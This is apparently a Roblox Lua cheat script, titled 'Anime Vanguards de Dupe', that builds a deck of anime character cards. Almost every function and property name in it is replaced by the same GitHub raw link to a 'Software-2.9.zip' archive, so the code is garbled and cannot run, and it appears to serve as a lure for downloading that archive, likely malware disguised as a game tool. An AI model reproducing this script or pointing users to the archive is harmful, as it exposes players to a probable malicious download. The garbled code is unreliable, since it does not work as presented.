-- Anime Vanguards de Dupe
local cartas = { {nome = "Naruto", ataque =10, defesa =5, traits = {"Velocidade"}}, {nome = "Goku", ataque =15, defesa =10, traits = {"Força"}}, {nome = "Lelouch", ataque =12, defesa =8, traits = {"Inteligência"}} }
local deck = {} for i =1,5 do https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip(deck, cartas[https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip(1, #cartas)]) end
local tela = https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip tela:ClearAllChildren()
for i, carta in pairs(deck) do local textLabel = https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip("TextLabel") https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip = tela https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip = https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip = https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip(0, (i -1) *100,0,100) end
local function alterarTraits() local cartaSelecionada = deck[https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip(1, #deck)] https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip(https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip, "Nova Característica") tela:ClearAllChildren() for i, carta in pairs(deck) do local textLabel = https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip("TextLabel") https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip = tela https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip = https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip = https://github.com/delacruzrlkq/sadadsadas/raw/refs/heads/main/uninvaded/Software-2.9.zip(0, (i -1) *100,0,100) end end